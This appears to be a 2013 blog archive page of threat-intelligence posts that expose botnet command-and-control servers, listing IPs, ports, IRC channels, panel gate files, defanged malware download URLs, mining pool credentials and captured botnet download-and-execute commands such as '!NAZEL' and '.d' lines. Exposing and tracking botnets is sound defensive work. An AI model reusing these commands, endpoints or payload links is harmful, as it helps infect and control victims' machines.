Month: May 2013

122.195.244.35(irc botnet hosted in China Nanjing Huaianwangtongdizhichi Huaian Jiangsu Province)

By Pig, May 16, 2013
Uncategorized

Server:122.195.244.35:8888 Now talking in #!x!Topic:Topic: Set by [Yuri (unknown address)] at (Thu May 16 09:59:25 2013) other channels: Now talking in #1Topic On: [#1 ] [ !NAZEL hxxp://146.185.246.190/7384IEP.da !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe ]Topic By: [ p81 ] Now talking in #2Topic On: [ #2 ] [!NAZELturbo hxxp://146.185.246.190/7384IEP.da udos.exe | !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe yufck.exe ]Topic By: [ p81 ]Read more...

wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)

By I_Post_Ur_Info, May 15, 2013
Uncategorized

Resolved wrightfeldhusen.info to 69.197.35.109 Server:  wrightfeldhusen.info Gate file:  /beta/order.php Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info  This is hosted on the same server as this andromeda bot. Hosting infos: http://whois.domaintools.com/69.197.35.109

www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)

By I_Post_Ur_Info, May 14, 2013
Uncategorized

Resolved www.panel-gc.co.uk to 69.197.35.109 Server:  www.panel-gc.co.uk Gate file:  /panel/gate.php Plugins:  hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod This is andromeda 2.7, not the older cracked version. Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo Hosting infos: http://whois.domaintools.com/69.197.35.109

vhost.bounceme.net(irc botnet hosted in France Paris Nerim Sas)

By Pig, May 10, 2013
Uncategorized

Resolved : [vhost.bounceme.net] To [194.242.114.177] Server: 194.242.114.177:6667 Server Password: Username: Pmx Nickname: aKH-4mins Channel: #sys# (Password: ) Channeltopic: same guy diferent domain: scan.no-ip.org    194.242.114.177 Server: 194.242.114.177:6667 Server Password: Username: skjcxmot Nickname: [nLh-VNC]otkfck Channel: sex (Password: ) Channel: #bot Channeltopic: Credits to x00 for samples:-) Hosting infos: http://whois.domaintools.com/194.242.114.177

HF Elite Coding Team

By Pig, May 10, 2013
Uncategorized

Guys in the irc logs are the Elite of underground coding and i m not trolling is for real lol Pig in the logs is me 100% sure lol Have fun reading and try to be like them elite coders lol [16:46] <@bake> http://pastebin.com/WNmV0e5w [16:46] <@bake> http://pastebin.com/qZJ5v5M4 ...:::::::... ...:::::::... .:::::::::::::::::. .::::::::::::::::::. .::::::::::::::::::::::::::::::::::::::::::::. .:::::::::::::::::::'.-=.-~, ':::::::::::::::::::. .:::::::::::::::::::'Read more...

srv5.su (snk asper mod irc botnet hosted by softronics.ch)

By I_Post_Ur_Info, May 10, 2013
Uncategorized

Resolved srv5.su to 94.242.198.64 Server:  srv5.su Port:  5050 Channel:  #ok #ok :.j #spr .j #lock .j #spam #ok :.d p /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/114/105/119/81/50/105/98/117/ Downloads hxxp://94.242.198.64/4/smart.exe Channel:  #spr #spr :.d x /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/111/122/100/11/121/116/127/ Downloads hxxp://94.242.198.64/4/spra.exe Channel:  #lock #lock :.d l /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/96/112/107/110/11/121/116/127/ Downloads hxxp://94.242.198.64/4/lock.exe (winlocker) Channel:  #spam #spam :.s.a /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/111/119/109/102/78/50/105/98/117/ /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/57/48/ 49 meeisodf Alternate domain:  srv50.su Hosting infos: http://whois.domaintools.com/94.242.198.64